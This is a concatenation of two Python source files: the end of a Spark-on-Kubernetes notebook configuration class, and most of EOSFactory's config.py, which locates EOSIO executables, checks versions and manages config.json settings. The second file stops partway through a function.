        """ Get spark max memory (as a string, from MAX_MEMORY env var) """
        return os.environ.get('MAX_MEMORY', '2')

    def get_spark_version(self):
        """ Get spark version """
        from pyspark import __version__ as spark_version
        return spark_version

    def get_spark_user(self):
        """ Get the Spark user name (SPARK_USER env var, '' by default) """
        return os.environ.get('SPARK_USER', '')

    def get_spark_needs_auth(self):
        """ Do not require auth if SPARK_AUTH_REQUIRED is 0,
            e.g. in case HADOOP_TOKEN_FILE_LOCATION has been provided
        """
        return os.environ.get('SPARK_AUTH_REQUIRED', 'false') == 'true'

    def close_spark_session(self):
        # Stop the SparkContext bound to the notebook's 'sc' variable, if any.
        sc = self.connector.ipython.user_ns.get('sc')
        if sc and isinstance(sc, SparkContext):
            sc.stop()

    def _parse_options(self, _opts):
        """ Parse options and set defaults.

        Each option value may contain {VARIABLE} placeholders, which are
        substituted with the corresponding environment variable.
        """
        _options = {}
        if 'options' in _opts:
            for name, value in _opts['options'].items():
                replaceable_values = {}
                for _, variable, _, _ in Formatter().parse(value):
                    if variable is not None:
                        replaceable_values[variable] = os.environ.get(variable)
                value = value.format(**replaceable_values)
                _options[name] = value
        return _options

    def configure(self, opts, ports):
        """ Initializes Spark configuration object """
        # Check if there's already a conf variable.
        # If using SparkMonitor, this is defined but is of type SparkConf.
        conf = SparkConf().setMaster("k8s://https://kubernetes:443")\
            .setAppName("Notebook")\
            .set("spark.executor.memory", "1g")\
            .set("spark.executor.instances", "1")\
            .set("spark.kubernetes.container.image", "dodasts/spark:v3.0.0")\
            .set("spark.kubernetes.authenticate.driver.serviceAccountName","default")\
            .set("spark.submit.deployMode", "client")\
            .set('spark.extraListeners', 'sparkmonitor.listener.JupyterSparkMonitorListener')\
            .set('spark.driver.extraClassPath', '/opt/conda/lib/python3.8/site-packages/sparkmonitor/listener.jar')\
            .set('spark.driver.host', socket.gethostbyname(socket.getfqdn()))\
            #.set("spark.hadoop.fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")\
            #.set("spark.hadoop.fs.s3a.path.style.access", "true")\
            #.set("spark.hadoop.fs.s3a.fast.upload", "true")
            #.set("spark.hadoop.fs.s3a.endpoint", "<minio host>:31311")
            #.set("spark.hadoop.fs.s3a.access.key", "admin")
            #.set("spark.hadoop.fs.s3a.secret.key", "adminminio")
            #.set("spark.hadoop.fs.s3a.fast.upload", "true")
            #.set("spark.hadoop.fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")
        # User-supplied options override the defaults above.
        options = self._parse_options(opts)
        for name, value in options.items():
            conf.set(name, value)
        return conf
class SparkLocalConfiguration(SparkConfiguration):
    """Spark configuration for the 'local' cluster type."""

    def configure(self, opts, ports):
        """ Initialize local-mode configuration for Spark.

        NOTE(review): the original docstring said "YARN configuration",
        but this class handles the 'local' cluster type; it simply reuses
        the base-class configuration unchanged.
        """
        conf = super(self.__class__, self).configure(opts, ports)
        return conf

    def get_spark_session_config(self):
        # Expose the Spark history-server URL when a SparkContext exists.
        conn_config = {}
        sc = self.connector.ipython.user_ns.get('sc')
        if sc and isinstance(sc, SparkContext):
            history_url = 'http://' + socket.gethostbyname(socket.getfqdn()) + ':' + '8080'
            conn_config['sparkhistoryserver'] = history_url
        return conn_config
|
<gh_stars>0
import os
import stat
import argparse
import json
import re
import subprocess
import eosfactory
import eosfactory.core.errors as errors
import eosfactory.core.logger as logger
import eosfactory.core.utils as utils
# Version pins used by the installer and environment checks.
VERSION = "3.3.0"
EOSIO_VERSION = "1.8.0"
EOSIO_CDT_VERSION = "1.6.1"
PYTHON_VERSION = "3.5 or higher"

# Well-known directories and names.
EOSFACTORY_DIR = "eosfactory/"
TMP = "/tmp/eosfactory/"
SETUPTOOLS_NAME = "eosfactory_tokenika"
# Regex extracting the version segment of an eosio.cdt installation path.
EOSIO_CDT_PATTERN = r".+/eosio\.cdt/(\d\.\d\.\d)/.*"
UBUNTU_PATTERN = r"\s*\"(.*CanonicalGroupLimited.Ubuntu.*/LocalState/rootfs)/.*"
BUILD = "build"
IGNORE_FILE = ".eosideignore"
IGNORE_LIST = [".vscode/ipch/*", ".vscode/settings.json", ".vscode/tasks.json",\
    "build/*","command_lines.txt"]
LOCALHOST_HTTP_ADDRESS = "127.0.0.1:8888"
DEFAULT_TEMPLATE = "hello_world"
FROM_HERE_TO_EOSF_DIR = "../../../"
CONFIG_DIR = "config"
CONFIG_JSON = "config.json"
CONTRACTS_DIR = "contracts/"
TEMPLATE_DIR = ("TEMPLATE_DIR", "templates/contracts")
PROJECT_0 = "empty_project"

# Each trailing-underscore tuple below is a configuration entry of the form
# (config.json/environment key, [hard-coded default value(s)], ...).
eosfactory_data_ = ("EOSFACTORY_DATA_DIR",
    [os.path.expandvars("${HOME}/.local/" + EOSFACTORY_DIR),\
        "/usr/local/" + EOSFACTORY_DIR,],
    [])
node_address_ = ("LOCAL_NODE_ADDRESS", [LOCALHOST_HTTP_ADDRESS])
wallet_address_ = ("WALLET_MANAGER_ADDRESS", [LOCALHOST_HTTP_ADDRESS])
genesis_json_ = ("EOSIO_GENESIS_JSON",
    ["/home/cartman/.local/share/eosio/nodeos/config/genesis.json"])
nodeos_config_dir_ = ("NODEOS_CONFIG_DIR", [None])
nodeos_data_dir_ = ("NODEOS_DATA_DIR", [None])
nodeos_options_ = ("NODEOS_OPTIONS", [])
keosd_wallet_dir_ = ("KEOSD_WALLET_DIR", ["${HOME}/eosio-wallet/"])
chain_state_db_size_mb_ = ("EOSIO_SHARED_MEMORY_SIZE_MB", ["300"])
wsl_root_ = ("WSL_ROOT", [None])
nodeos_stdout_ = ("NODEOS_STDOUT", [None])
includes_ = ("INCLUDE", "includes")
libs_ = ("LIBS", "libs")
# Executable lookup lists: first entry that resolves wins.
cli_exe_ = ("EOSIO_CLI_EXECUTABLE",
    ["cleos", "/usr/bin/cleos", "/usr/local/bin/cleos"])
keosd_exe_ = ("KEOSD_EXECUTABLE",
    ["keosd","/usr/bin/keosd", "/usr/local/bin/keosd"])
node_exe_ = ("LOCAL_NODE_EXECUTABLE",
    ["nodeos","/usr/bin/nodeos", "/usr/local/bin/nodeos"])
eosio_cpp_ = ("EOSIO_CPP",
    ["eosio-cpp", "/usr/bin/eosio-cpp", "/usr/local/bin/eosio-cpp"])
eosio_cdt_root_ = ("EOSIO_CDT_ROOT",
    ["/usr/opt/eosio.cdt/0.0.0/", "/usr/local/Cellar/eosio.cdt/0.0.0/opt/eosio.cdt/"])
eosio_cpp_includes_ = (
    "EOSIO_CPP_INCLUDES",
    [["include", "include/libcxx", "include/eosiolib/core", \
        "include/eosiolib/contracts"]])
# Default development keys for the 'eosio' account (private key redacted here).
key_private_ = (
    "EOSIO_KEY_PRIVATE",
    ["<KEY>"])
key_public_ = (
    "EOSIO_KEY_PUBLIC",
    ["EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV"])
contract_workspace_dir_ = (
    "EOSIO_CONTRACT_WORKSPACE", [CONTRACTS_DIR])
def eosfactory_data():
    '''Data directory.

    For developer's installation, data is in the root of the installation.
        .: wsl_root.sh
        config: config.ini, config.json, genesis.json, ...
        contracts: eosio_token, hello_world, tic_tac_toe, ...
        templates: contracts, ...
        includes: eoside, ...
        libs: ...

    Raises:
        .core.errors.Error: If no candidate contains config/config.ini.
    '''
    linkage = is_site_package()
    # Candidate roots depend on how EOSFactory is installed:
    # 0 -> repository checkout, 1 -> local site-packages, 2 -> system.
    if not linkage:
        candidates = [eosf_dir()]
    elif linkage == 1:
        candidates = eosfactory_data_[1]
    else:
        candidates = eosfactory_data_[2]
    tested = []
    for candidate in candidates:
        tested.append(candidate)
        if os.path.exists(os.path.join(candidate, "config", "config.ini")):
            return candidate
    msg = "Cannot determine the directory of application data. Tried:"
    for candidate in tested:
        msg = '''{}
    {}
'''.format(msg, candidate)
    raise errors.Error(msg, translate=False)
def is_site_package():
    '''Classify the EOSFactory installation location.

    Returns:
        int: 0 for a developer's (repository) installation, 1 for a local
        site-packages installation, 2 for a system site-packages one.

    Raises:
        .core.errors.Error: If the location cannot be classified.
    '''
    eosfactory_path = eosfactory.__path__
    verdict = -1
    for entry in eosfactory_path:
        if "site-packages" in entry:
            verdict = 1 if "local" in entry else 2
            break
        if "eosfactory/eosfactory" in entry:
            # Developer's installation, e.g.
            # ['/mnt/c/Workspaces/EOS/eosfactory/eosfactory']
            verdict = 0
    if verdict == -1:
        raise errors.Error('''
Cannot determine the configuration directory. 'eosfactory.__path__' is
{}
'''.format(eosfactory_path), translate=False)
    return verdict
def set_contract_workspace_dir(contract_workspace_dir=None, is_set=False):
    '''Set and persist the smart-contract workspace directory in config.json.

    If *contract_workspace_dir* is a valid existing directory it is stored
    silently; otherwise the user is prompted interactively until a valid
    path is entered.

    Args:
        contract_workspace_dir (str): Candidate directory, or None to prompt.
        is_set (bool): Unused here; kept for interface compatibility.
    '''
    from termcolor import cprint, colored
    import pathlib

    def tilde(tilde_path):
        # Expand a leading "~" to the user's home directory.
        return tilde_path.replace("~", str(pathlib.Path.home()))

    def set(contract_workspace_dir):
        # Persist the path if it points to an existing directory.
        if contract_workspace_dir:
            path = utils.wslMapWindowsLinux(contract_workspace_dir)
            if os.path.exists(path) and os.path.isdir(path):
                map = config_map()
                map[contract_workspace_dir_[0]] = path
                write_config_map(map)
                return True
        return False

    if set(contract_workspace_dir):
        return

    current_path_color = "green"
    error_path_color = "red"
    # Prompt loop: repeat until a valid directory has been stored.
    while True:
        map = config_map()
        contract_workspace_dir = None
        if contract_workspace_dir_[0] in map:
            contract_workspace_dir = map[contract_workspace_dir_[0]]
        else:
            contract_workspace_dir = os.path.join(TMP, CONTRACTS_DIR)
        input_msg = utils.heredoc('''
Where do you prefer to keep your smart-contract projects?
The current location is:
{}
Otherwise, input another existing directory path, or nothing to
keep the current one:
'''.format(colored(contract_workspace_dir, current_path_color))
        ) if os.path.exists(contract_workspace_dir) else utils.heredoc('''
Where do you prefer to keep your smart-contract projects?
The set location is:
{}
but it does not exist. Input an existing directory path:
'''.format(colored(contract_workspace_dir, current_path_color))
        )

        new_dir = tilde(input(input_msg + "\n"))
        if not new_dir:
            # Empty input keeps the currently shown directory.
            new_dir = contract_workspace_dir
        if set(new_dir):
            print("OK")
            break
        else:
            print("\n" + utils.heredoc('''
The path you entered:
{}
doesn't seem to exist!
''').format(colored(new_dir, error_path_color)) + "\n")
def config_dir():
    '''The absolute path of the EOSFactory configuration directory.

    Raises:
        .core.errors.Error: If the directory does not exist.
    '''
    directory = os.path.join(eosfactory_data(), CONFIG_DIR)
    if os.path.exists(directory):
        return directory
    raise errors.Error('''
Cannot find the configuration directory
{}
'''.format(directory), translate=False)
def template_dir():
    '''The absolute path of the contract-template directory.

    Raises:
        .core.errors.Error: If the directory does not exist.
    '''
    directory = os.path.join(eosfactory_data(), TEMPLATE_DIR[1])
    if os.path.exists(directory):
        return directory
    raise errors.Error('''
Cannot find the template directory
{}
'''.format(directory), translate=False)
def eoside_includes_dir():
    '''The directory for contract definition includes, or None if missing.

    It may be set with *INCLUDE* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    candidate = includes_[1]
    if not os.path.isabs(candidate):
        candidate = os.path.join(eosfactory_data(), includes_[1])
    return candidate if os.path.exists(candidate) else None
def eoside_libs_dir():
    '''The directory for contract links, or None if missing.

    It may be set with *LIBS* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    candidate = libs_[1]
    if not os.path.isabs(candidate):
        candidate = os.path.join(eosfactory_data(), libs_[1])
    return candidate if os.path.exists(candidate) else None
def contract_workspace_dir(dont_set_workspace=False):
    '''The absolute path to the contract workspace.

    The contract workspace is a directory where automatically created projects
    are placed by default. It is set while EOSFactory is installed.

    If not set, the projects are stored in the `.config.CONTRACTS_DIR`
    subdirectory (typically *contracts/*) of the EOSFactory installation, if
    EOSFactory is installed from its GitHub repository, otherwise, they go to
    a directory specified as
    `join(.config.TMP, .config.CONTRACTS_DIR)`.

    The setting may be changed with
    *EOSIO_CONTRACT_WORKSPACE* entry in the *config.json* file,
    see :func:`.current_config`.

    Args:
        dont_set_workspace (bool): If set, do not query for empty workspace
            directory.

    Raises:
        .core.errors.Error: If the configured directory does not exist and
            cannot be created.
    '''
    if dont_set_workspace:
        return config_map()[contract_workspace_dir_[0]]
    if not contract_workspace_dir_[0] in config_map():
        set_contract_workspace_dir()

    workspace_dir = config_value(contract_workspace_dir_)
    path = utils.wslMapWindowsLinux(workspace_dir)
    if os.path.isabs(path):
        if os.path.exists(path):
            return path
        raise errors.Error('''
The path
    '{}',
set as the contract workspace directory, does not exist.
'''.format(path), translate=False)

    # Relative path: resolve against the repository root (developer install)
    # or the temporary directory (site-packages install), creating it on demand.
    if not is_site_package():
        path = os.path.join(eosf_dir(), path)
    else:
        path = os.path.join(TMP, path)
    if not os.path.exists(path):
        os.makedirs(path)
    if os.path.exists(path):
        return path
    # BUG FIX: 'translate=False' was previously passed to str.format() (where
    # it is silently ignored) instead of to errors.Error().
    raise errors.Error('''
The path
    '{}'
resolved as the contract workspace directory directory does not exist.
'''.format(workspace_dir), translate=False)
def eosf_dir():
    '''The absolute directory of the EOSFactory installation.

    Raises:
        .core.errors.Error: If the resolved root does not exist.
    '''
    # Walk up FROM_HERE_TO_EOSF_DIR from this file to the installation root.
    root = os.path.realpath(os.path.join(
        os.path.realpath(__file__), FROM_HERE_TO_EOSF_DIR))
    if not os.path.exists(root):
        raise errors.Error('''
Cannot determine the root directory of the EOSFactory installation.
The path to the file 'config.py' is
    '{}'.
The expected installation path, which is
    '{}',
is reported as non-existent.
'''.format(__file__, root), translate=False)
    return root
def eosio_key_private():
    '''*eosio* account private key.

    The value of the *signature-provider* option on the *nodeos* command
    line. It may be changed with the *EOSIO_KEY_PRIVATE* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return config_value_checked(key_private_)
def eosio_key_public():
    '''*eosio* account public key.

    The value of the *signature-provider* option on the *nodeos* command
    line. It may be changed with the *EOSIO_KEY_PUBLIC* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return config_value_checked(key_public_)
def chain_state_db_size_mb():
    '''The size of the buffer of the local node.

    The value of the *chain-state-db-size-mb* option on the *nodeos*
    command line. It may be changed with the *EOSIO_SHARED_MEMORY_SIZE_MB*
    entry in the *config.json* file, see :func:`.current_config`.
    '''
    return config_value_checked(chain_state_db_size_mb_)
def wsl_root():
    '''The root directory of the Windows WSL, or empty string if not Windows.

    The root directory of the Ubuntu file system, owned by the installation,
    if any, of the Windows Subsystem Linux (WSL).

    It may be changed with
    *WSL_ROOT* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    if not utils.is_windows_ubuntu():
        return ""
    wsl_root_sh = "wsl_root.sh"
    wsl_root_sh = os.path.join(eosfactory_data(), wsl_root_sh)
    # Resolve once per process and cache the result in wsl_root_[1][0].
    if wsl_root_[1][0] is None:
        path = ""
        path, error = utils.spawn(
            [wsl_root_sh, path], raise_exception=False)
        if error:
            # Fall back to asking the user; empty input gives up.
            while True:
                if not os.path.exists(wsl_root_sh):
                    path = ""
                    logger.ERROR('''
Cannot find the bash command:
'{}'
The intelisense feature of Visual Studio Code will be disabled.
'''.format(wsl_root_sh), translate=False)
                    break
                path = input(logger.error('''
Error message is
{}
Cannot find the root of the WSL file system which was tried to be
'{}'
Please, find the path in your computer and enter it. Enter nothing, if you do
not care about having efficient the intelisense of Visual Studio Code.
'''.format(error, path), translate=False) + "\n<<< ")
                if not path:
                    break
                path, error = utils.spawn(
                    [wsl_root_sh, path], raise_exception=False)
                if not error:
                    break
        # Normalize to forward slashes with a lower-case drive letter.
        path = path.replace("\\", "/")
        path = path.replace(path[0:2], path[0:2].lower())
        wsl_root_[1][0] = path
    return wsl_root_[1][0]
def nodeos_stdout():
    '''File receiving the *stdout* stream of the local node, or None.

    If the *NODEOS_STDOUT* entry in the *config.json* file is set, the local
    node logs its output to that file, see :func:`.current_config`.

    Note:
        The same may be achieved with the *nodeos_stdout* argument in the
        function :func:`.core.manager.resume`.
    '''
    return config_value(nodeos_stdout_)
def http_server_address():
    '''The http/https URL where local *nodeos* is running.

    The setting may be changed with the *LOCAL_NODE_ADDRESS* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return config_value_checked(node_address_)
def http_wallet_address():
    '''The http/https URL where keosd is running.

    Falls back to :func:`http_server_address` when unset. The setting may
    be changed with the *WALLET_MANAGER_ADDRESS* entry in the *config.json*
    file, see :func:`.current_config`.
    '''
    return config_value(wallet_address_) or http_server_address()
def node_exe():
    '''The path to the *nodeos* executable.

    The setting may be changed with the *LOCAL_NODE_EXECUTABLE* entry in
    the *config.json* file, see :func:`.current_config`.
    '''
    return first_valid_which(node_exe_)
def cli_exe():
    '''The path to the *cleos* executable.

    The setting may be changed with the *EOSIO_CLI_EXECUTABLE* entry in
    the *config.json* file, see :func:`.current_config`.
    '''
    return first_valid_which(cli_exe_)
def keosd_exe():
    '''The path to the *keosd* executable.

    The setting may be changed with the *KEOSD_EXECUTABLE* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return first_valid_which(keosd_exe_)
def eosio_cpp():
    '''The path to the *eosio-cpp* executable.

    The setting may be changed with the *EOSIO_CPP* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return first_valid_which(eosio_cpp_)
def eosio_version():
    '''Detect the installed EOSIO (nodeos) version.

    Returns:
        list: [detected_version], or [detected_version, EOSIO_VERSION] when
        the detected major.minor differs from the expected one, or
        ["", EOSIO_VERSION] when *nodeos* does not respond.
    '''
    try:
        # Call the executable directly with an argument list — consistent
        # with eosio_cpp_version() — instead of the previous
        # `echo $(nodeos --version)` shell round-trip, which broke when the
        # executable path contained spaces and needlessly invoked a shell.
        version = subprocess.check_output(
            [node_exe(), "--version"],
            timeout=10).decode("ISO-8859-1").strip().replace("v", "")
        retval = [version]
        if not version.split(".")[:2] == EOSIO_VERSION.split(".")[:2]:
            retval.append(EOSIO_VERSION)
        return retval
    except Exception:
        return ["", EOSIO_VERSION]
def eosio_cpp_version():
    '''Detect the installed eosio.cdt (eosio-cpp) version.

    Returns:
        list: [detected_version], or [detected_version, EOSIO_CDT_VERSION]
        on a major.minor mismatch, or ["", EOSIO_CDT_VERSION] when
        *eosio-cpp* does not respond.
    '''
    try:
        raw = subprocess.check_output(
            [eosio_cpp(), "-version"], timeout=5).decode("ISO-8859-1")
        version = raw.strip().replace("eosio-cpp version ", "")
    except Exception:
        return ["", EOSIO_CDT_VERSION]
    result = [version]
    if version.split(".")[:2] != EOSIO_CDT_VERSION.split(".")[:2]:
        result.append(EOSIO_CDT_VERSION)
    return result
def eosio_cdt_root():
    '''The path to the *eosio-cpp* installation directory.

    The setting may be changed with
    *EOSIO_CPP* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    # find /usr -wholename "*/eosio.cdt/1.6.1"
    config_json = config_map()
    if eosio_cdt_root_[0] in config_json and config_json[eosio_cdt_root_[0]]:
        return config_json[eosio_cdt_root_[0]]

    eosio_cpp_version_ = eosio_cpp_version()
    if not eosio_cpp_version_:
        raise errors.Error(
            '''
        'eosio-cpp' does not response.
        ''')

    # Substitute the detected toolchain version into each versioned
    # candidate path (the hard-coded defaults use the 0.0.0 placeholder).
    version_pattern = re.compile(EOSIO_CDT_PATTERN)
    tested = []
    for path in eosio_cdt_root_[1]:
        tested.append(path)
        if version_pattern.match(path):
            path = path.replace(
                re.findall(version_pattern, path)[0], eosio_cpp_version_[0])
        if(os.path.exists(path)):
            return path

    msg = "Cannot determine the installation directory of 'eosio-cdt. Tried:"
    for path in tested:
        msg = '''{}
    {}
'''.format(msg, path)
    msg = '''{}
Define it in the config file
    {}
'''.format(msg, config_file())
    raise errors.Error(msg, translate=False)
def eosio_cpp_includes():
    '''The list of eosio-cpp include directories.

    The setting may be changed with *EOSIO_CPP* entry in the *config.json*
    file, see :func:`.current_config`.
    '''
    root = eosio_cdt_root()
    # os.path.join handles roots with or without a trailing slash; the
    # previous raw string concatenation produced broken paths when the
    # configured root lacked the trailing '/'. Also avoids shadowing the
    # builtin 'list'.
    return [os.path.join(root, include)
            for include in eosio_cpp_includes_[1][0]]
def keosd_wallet_dir(raise_error=True):
    '''The path to the local wallet directory.

    The path is hard-coded in the *keosd* wallet manager.

    Args:
        raise_error (bool): If set, rise an error if the path is invalid.

    Raises:
        .core.errors.Error: If the directory does not exist.
    '''
    path = first_valid_path(keosd_wallet_dir_, raise_error=False)
    if not path:
        # Nudge keosd into creating its wallet directory, then retry once.
        from eosfactory.core.cleos import WalletList
        WalletList()
        path = first_valid_path(keosd_wallet_dir_, raise_error=False)
        if not path:
            if raise_error:
                raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(keosd_wallet_dir_[0], keosd_wallet_dir_[1]),
                    translate=False)
    return path
def config_file():
    '''The path to the *config.json* file.

    Creates an empty JSON file there if none exists yet.
    '''
    file = os.path.join(config_dir(), CONFIG_JSON)
    if os.path.exists(file):
        return file
    try:
        with open(file, "w+") as f:
            f.write("{}")
    except Exception as e:
        raise errors.Error(str(e), translate=False)
    return file
def config_map():
    '''Return a JSON object read from the *config.json* file.

    Raises:
        .core.errors.Error: If the JSON object cannot be returned.
    '''
    path = config_file()
    if not os.path.exists(path):
        raise errors.Error('''
Cannot find the config file.
''', translate=False)
    try:
        # Named 'config_input' so the builtin input() is not shadowed.
        with open(path, "r") as config_input:
            text = config_input.read()
            return json.loads(text) if text else {}
    except Exception as e:
        raise errors.Error(str(e), translate=False)
def write_config_map(map):
    '''Write the given json object to *config.json*.

    Args:
        map (json): The json object to be saved.

    Raises:
        .core.errors.Error: If the config file cannot be found.
    '''
    path = config_file()
    if not os.path.exists(path):
        raise errors.Error('''
Cannot find the config file.
''', translate=False)
    with open(path, "w+") as output:
        output.write(json.dumps(map, indent=4))
def config_values(config_list):
    '''List values ascribed to the key of a hard-codded configuration list.

    A value present in *config.json* takes precedence; otherwise the
    hard-coded defaults from *config_list* are returned.

    Args:
        config_list (tuple): A configure list tuple.
    '''
    config_key = config_list[0]
    config_json = config_map()
    if config_json.get(config_key):
        return [config_json[config_key]]
    defaults = config_list[1]
    return defaults if defaults else []
def config_value(config_list):
    '''Get the first item from :func:`.config_values`, or None.

    Args:
        config_list (tuple): A configure list tuple.
    '''
    values = config_values(config_list)
    if values:
        return values[0]
    return None
def config_value_checked(config_list):
    '''Get the first item from :func:`.config_values`. Raise an error if fails.

    Args:
        config_list (tuple): A configure list tuple.

    Raises:
        .core.errors.Error: If the result is not defined.
    '''
    value = config_value(config_list)
    if value is None:
        raise errors.Error('''
The value of {} is not defined.
Tried:
{}
Define it in the config file
{}
'''.format(config_list[0], config_list[1], config_file()), translate=False)
    return value
def first_valid_which(config_list, find_file=None, raise_error=True):
    '''Given a key to the config list, get a valid file system path.

    Applicable if the *config_list* argument refers to a file path.
    The path may be absolute or relative to the root of the EOSFactory
    installation.

    Also, the path may be relative to the *HOME* environment variable.

    Args:
        config_list (tuple): A configure list tuple.
        find_file (str): If set, the given file has to exist.
        raise_error (bool): If set, raise an error on failure.

    Raises:
        .core.errors.Error: If the *raise_error* argument is set and the \
            result is not defined.
    '''
    values = config_values(config_list)
    if values[0]:
        for path in values:
            if os.path.isabs(path):
                if find_file:
                    if os.path.exists(os.path.join(path, find_file)):
                        return path
            else:
                # Relative entries are resolved via PATH lookup.
                if utils.which(path):
                    return path

    if raise_error:
        # NOTE(review): this call discards its result — it looks like dead
        # code; confirm before removing.
        config_values(config_list)
        raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(config_list[0], config_list[1]), translate=False)
    else:
        return None
def first_valid_path(config_list, find_file=None, raise_error=True):
    '''Given a key to the config list, get a valid file system path.

    Applicable if the *config_list* argument refers to a file path.
    The path may be absolute or relative to the root of the EOSFactory
    installation.

    Also, the path may be relative to the *HOME* environment variable.

    Args:
        config_list (tuple): A configure list tuple.
        find_file (str): If set, the given file has to exist.
        raise_error (bool): If set, raise an error on failure.

    Raises:
        .core.errors.Error: If the *raise_error* argument is set and the \
            result is not defined.
    '''
    values = config_values(config_list)
    if values[0]:
        for path in values:
            # Expand a literal "${HOME}" placeholder before testing the path.
            if "${HOME}" in path:
                home = None
                if "HOME" in os.environ:
                    home = os.environ["HOME"]
                if home:
                    path = path.replace("${HOME}", home)
                    if find_file:
                        if os.path.exists(os.path.join(path, find_file)):
                            return path
                    else:
                        if os.path.exists(path):
                            return path
            if os.path.isabs(path):
                if find_file:
                    if os.path.exists(os.path.join(path, find_file)):
                        return path
                else:
                    if os.path.exists(path):
                        return path

    if raise_error:
        raise errors.Error('''
Cannot find any path for '{}'.
Tried:
{}
'''.format(config_list[0], config_list[1]), translate=False)
    else:
        return None
def nodeos_data_dir():
    '''Directory containing runtime data of *nodeos*, or None if unset.

    It may be changed with the *NODEOS_DATA_DIR* entry in the *config.json*
    file, see :func:`.current_config`.
    '''
    return nodeos_data_dir_[1][0]
def nodeos_config_dir():
    '''Directory containing configuration files such as config.ini.

    It may be changed with
    *NODEOS_CONFIG_DIR* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    # First (and only) default in the NODEOS_CONFIG_DIR configure-list tuple.
    return nodeos_config_dir_[1][0]
def nodeos_options():
    '''Additional command-line options passed to *nodeos*.

    Returns the default-value list of the *NODEOS_OPTIONS* configure-list
    tuple; it may be changed with the *NODEOS_OPTIONS* entry in the
    *config.json* file, see :func:`.current_config`.
    '''
    return nodeos_options_[1]
def genesis_json():
    '''File to read Genesis State from.

    It may be changed with
    *EOSIO_GENESIS_JSON* entry in the *config.json* file,
    see :func:`.current_config`.
    '''
    path = first_valid_path(genesis_json_, raise_error=False)
    if not path:
        # Fall back to the default file in the configuration directory;
        # if even that is missing, there is no genesis file.
        fallback = os.path.join(config_dir(), "genesis.json")
        if not os.path.exists(fallback):
            return None
        path = fallback
    return path
def contract_dir(contract_dir_hint):
    '''Given a hint, determine the contract root directory.

    The ``contract_dir_hint`` is tested to be either

    - an absolute path, or
    - a path relative to either

        - the directory given with :func:`contract_workspace`, or
        - the directory given with :func:`eosf_dir` ``/contracts``.

    Args:
        contract_dir_hint (path): A directory path, may be not absolute.

    Raises:
        .core.errors.Error: If the result is not defined.
    '''
    hint = utils.wslMapWindowsLinux(contract_dir_hint)
    trace = hint + "\n"

    # If the hint points at a file, use the directory containing it.
    if os.path.isfile(hint):
        hint = os.path.dirname(hint)

    # ? the absolute path to a contract directory
    if os.path.isabs(hint) and os.path.exists(hint):
        return os.path.realpath(hint)

    # ? the relative path to a contract directory, relative to the directory
    # set with the 'contract_workspace_dir()' function
    candidate = os.path.join(contract_workspace_dir(), hint)
    trace = trace + candidate + "\n"
    if os.path.isdir(candidate):
        return os.path.realpath(candidate)

    # ? the relative path to a contract directory, relative to
    # 'eosfactory_data()/contracts'
    candidate = os.path.join(eosfactory_data(), CONTRACTS_DIR, hint)
    trace = trace + candidate + "\n"
    if os.path.isdir(candidate):
        return os.path.realpath(candidate)

    raise errors.Error('''
Cannot determine the contract directory.
Tried:
{}
'''.format(trace), translate=False)
def source_files(search_dir, extensions, recursively=False):
    '''List the files under *search_dir* whose extension is in *extensions*.

    Args:
        search_dir (str): The directory to search.
        extensions (list): Extensions to accept, including the dot
            (e.g. ``[".cpp", ".c"]``).
        recursively (bool): If set, descend into subdirectories.

    Returns:
        list: Real (absolute) paths of the matching files.
    '''
    collected = []
    for entry in os.listdir(search_dir):
        full_path = os.path.join(search_dir, entry)
        if os.path.isfile(full_path):
            if os.path.splitext(entry)[1] in extensions:
                collected.append(os.path.realpath(full_path))
        elif recursively:
            # Non-file entries are directories (or links); recurse on demand.
            collected.extend(source_files(full_path, extensions, recursively))
    return collected
def contract_source_files(contract_dir_hint):
    '''List CPP/C source files from the directory given a hint.

    Args:
        contract_dir_hint (str): An argument to the function
            :func:`.contract_dir`

    Returns:
        tuple: ``(search_dir, srcs)`` -- the resolved contract directory
        and the list of source files found in it.

    Raises:
        .core.errors.Error: If the list is empty.
    '''
    search_dir = contract_dir(contract_dir_hint)
    trace = search_dir + "\n"
    srcs = source_files(
        search_dir, [".c", ".cpp", ".cxx", ".c++"], recursively=True)
    if srcs:
        return (search_dir, srcs)
    raise errors.Error('''
Cannot find any contract source directory.
Tried:
{}
'''.format(trace), translate=False)
def abi_file(contract_dir_hint):
    '''Given the contract directory, return the ABI file path.
    See :func:`contract_file`.

    Args:
        contract_dir_hint: A directory path, may be not absolute.

    Returns:
        str: The ABI file path, or None if the build directory or the
        file does not exist.

    Raises:
        .core.errors.Error: If more than one candidate ABI file is found.
    '''
    search_dir = os.path.join(contract_dir(contract_dir_hint), BUILD)
    if not os.path.exists(search_dir):
        # No build directory -- nothing to search.
        return
    files_ = source_files(search_dir, [".abi"])
    if not files_:
        return
    # Accept only files that sit directly in the build directory, or in a
    # directory named like the build folder.
    files = []
    for file_ in files_:
        parent = os.path.dirname(file_)
        if os.path.basename(parent) == BUILD or parent == search_dir:
            files.append(file_)
    if not files:
        # BUG FIX: previously an empty filtered list fell through to
        # 'files[0]' and raised IndexError.
        return
    if len(files) > 1:
        # Grammar fixed in the user-facing message ('is' -> 'are').
        raise errors.Error('''
There are too many ABI files in the contract build folder
{}
There are files:
{}
'''.format(search_dir, "\n".join(files)))
    return files[0]
def wasm_file(contract_dir_hint):
    '''Given the contract directory, return the WASM file path.
    See :func:`contract_file`.

    Args:
        contract_dir_hint: A directory path, may be not absolute.

    Returns:
        str: The WASM file path, or None if the build directory or the
        file does not exist.

    Raises:
        .core.errors.Error: If more than one candidate WASM file is found.
    '''
    search_dir = os.path.join(contract_dir(contract_dir_hint), BUILD)
    if not os.path.exists(search_dir):
        # No build directory -- nothing to search.
        return
